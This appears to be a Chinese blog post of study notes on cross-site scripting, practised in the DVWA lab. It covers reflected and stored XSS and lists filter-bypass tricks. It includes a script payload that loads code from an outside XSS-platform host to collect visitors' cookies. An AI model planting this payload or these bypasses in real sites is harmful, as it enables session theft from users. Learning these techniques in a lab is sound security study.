xss绕过空格符号_第二轮学习笔记: XSS跨站脚本漏洞

扎头发,两圈太松,三圈太紧,洗澡,往左一点烫死,往右一点冻死,吃泡面,一桶吃不饱,两桶吃不完,就像我们的关系。。。

---- 网易云热评

跨站脚本攻击(XSS),恶意攻击者在web页面插入恶意script代码,当用户浏览该页面时,恶意代码就会被执行,达到攻击用户的目的。

形成原因:程序对输入和输出的过滤不严格

一、反射型XSS:需要欺骗用户自己点击链接才能出发XSS代码

1、在输入窗口输入123,点击提交,审查元素,可以看到提交的内容显示在了网页

c4abe743b056a648c5523b2a67e2bff6.png

2、在输入框输入:<script>alert('123')</script>,点击提交,弹出对话框,说明存在漏洞

6f59b3ae5441a3bfdbce7df03bc560e1.png

二、漏洞利用

1、找一个xss平台,注册账号,新建一个项目

3c93ee33a2b4baea63302259e4b84e33.png

613e1b6a4225b1f9ea3a47b043895f73.png

2、复制关键代码:<sCRiPt sRC=https://xss.wtf/ltkW></sCrIpT>,将该代码复制到存在漏洞的页面,然后提交

2896b6f30fcd5a44a2be59ca3c59ff9c.png

3、打开xss平台上创建的项目,我们可以得到DVWA平台登录的cookie

607ecac9a8ecda2038c7a44d5fef4ff2.png

三、存储型XSS:用户只要访问存在该漏洞的页面就会触发

1、在对话框输入<script>alert('123')</script>,提交,每次刷新页面都会弹出,说明该处存在xss漏洞

6fc18838cc5550e0902f2ea864de51bc.png

2、在对话框输入xss平台上生成的代码<sCRiPt sRC=https://xss.wtf/ltkW></sCrIpT>,点击提交,只要访问该页面的用户,都会在xss平台上看到他的cookie信息

eef87e8ed38930e37923931364238905.png

四、xss绕过

1、大小写绕过,将<script>修改为<ScRipt>

2、双写绕过,将<script>修改为<Sc<script>Ript>

3、注释绕过,将<script>修改为<scri<!--aaa--->pt>

4、实体转换,将&改为&amp,将<改为&lt,将>改为&gt等等

禁止非法,后果自负

欢迎关注公众号:web安全工具库

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值